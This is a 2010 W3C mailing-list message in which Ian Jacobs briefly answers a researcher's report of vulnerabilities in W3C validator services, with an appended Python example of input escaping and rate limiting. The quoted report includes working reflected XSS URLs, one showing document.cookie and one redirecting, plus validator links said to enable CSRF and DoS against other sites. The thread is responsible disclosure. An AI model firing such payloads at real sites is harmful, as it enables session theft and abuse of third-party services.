- From: Ian Jacobs <ij@w3.org>
- Date: Wed, 30 Jun 2010 10:39:37 -0500
- To: "MustLive" <mustlive@websecurity.com.ua>
- Cc: <admin@w3.org>, <site-comments@w3.org>
On 30 Jun 2010, at 4:34 AM, MustLive wrote:

> Hello administrator of www.w3.org!
>
> I want to warn you about security vulnerabilities at your site.

Hi ML,

Thanks for sending this to us. We are aware of this and are looking into finding the right balance between continuing to offer services and to avoid abuse.

Best,

_ Ian

> These are Abuse of Functionality, Insufficient Anti-automation and
> Cross-Site Scripting vulnerabilities.
>
> Abuse of Functionality:
>
> This functionality can be used for conducting CSRF attacks on
> other sites.
>
> http://validator.w3.org/feed/check.cgi?url=http://google.com
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl
>
> http://validator.w3.org/check?uri=http://google.com
>
> http://jigsaw.w3.org/css-validator/validator?uri=http://google.com
>
> http://validator.w3.org/checklink?uri=http://google.com
>
> Note that the W3C Link Checker service can be used for scanning a
> whole site, and so it consumes more resources, both of W3C's server and
> of the site being scanned. It can be used for conducting DoS
> attacks on the mentioned servers. I mentioned such attacks in the
> article DoS attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/).
>
> http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance
>
> http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com
>
> Insufficient Anti-automation:
>
> At these pages there is no protection from automated requests
> (captcha). This allows automating the process of conducting CSRF
> attacks on other sites.
>
> XSS (IE):
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl
>
> Works only in Internet Explorer.
>
> Attend to the security of all of your web sites, web software and to
> security audit.
>
> I mentioned these vulnerabilities at my site (http://websecurity.com.ua/4320/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

--
Ian Jacobs (ij@w3.org)
http://www.w3.org/People/Jacobs/
Tel: +1 718 260 9447
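A defender-side illustration of the two issue classes raised in the report above (a reflected URL parameter echoed unescaped, and a fetch-by-URL feature with no check against automated use), added here as an example; it is not part of the thread or of W3C's validator code, and the handler, parameter names and limits are assumptions.

```python
# Added example (not W3C code): a minimal request handler for a
# validator-style endpoint. The reflected "docAddrs" value is HTML-escaped
# wherever it is echoed, only absolute http(s) URLs are accepted before any
# fetch is attempted, and per-client requests are rate-limited with a
# sliding window. RATE_LIMIT / WINDOW_SECONDS are assumed values.
import html
import time
from collections import deque
from typing import Dict, Deque, Optional, Tuple
from urllib.parse import urlparse

RATE_LIMIT = 5          # requests per client per window (assumed)
WINDOW_SECONDS = 60.0   # window length in seconds (assumed)

_history: Dict[str, Deque[float]] = {}


def allow_request(client_id: str, now: Optional[float] = None) -> bool:
    """Sliding-window limiter: at most RATE_LIMIT requests per client per window."""
    now = time.monotonic() if now is None else now
    q = _history.setdefault(client_id, deque())
    while q and now - q[0] >= WINDOW_SECONDS:   # drop timestamps outside the window
        q.popleft()
    if len(q) >= RATE_LIMIT:
        return False
    q.append(now)
    return True


def is_fetchable_url(value: str) -> bool:
    """Accept only absolute http(s) URLs with a host; anything else (markup,
    a javascript: URL, a bare word) is rejected before a fetch is attempted."""
    p = urlparse(value)
    return p.scheme in ("http", "https") and bool(p.netloc)


def render_response(doc_addrs: str, client_id: str,
                    now: Optional[float] = None) -> Tuple[int, str]:
    """Return (HTTP status, HTML body). The submitted value is escaped in every
    place it is reflected, so a <script> payload is rendered as literal text."""
    if not allow_request(client_id, now):
        return 429, "<p>Too many requests; try again later.</p>"
    shown = html.escape(doc_addrs, quote=True)
    if not is_fetchable_url(doc_addrs):
        return 400, f"<p>Not a valid http(s) URL: {shown}</p>"
    return 200, f"<p>Checking {shown} ...</p>"
```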
Received on Wednesday, 30 June 2010 15:39:44 UTC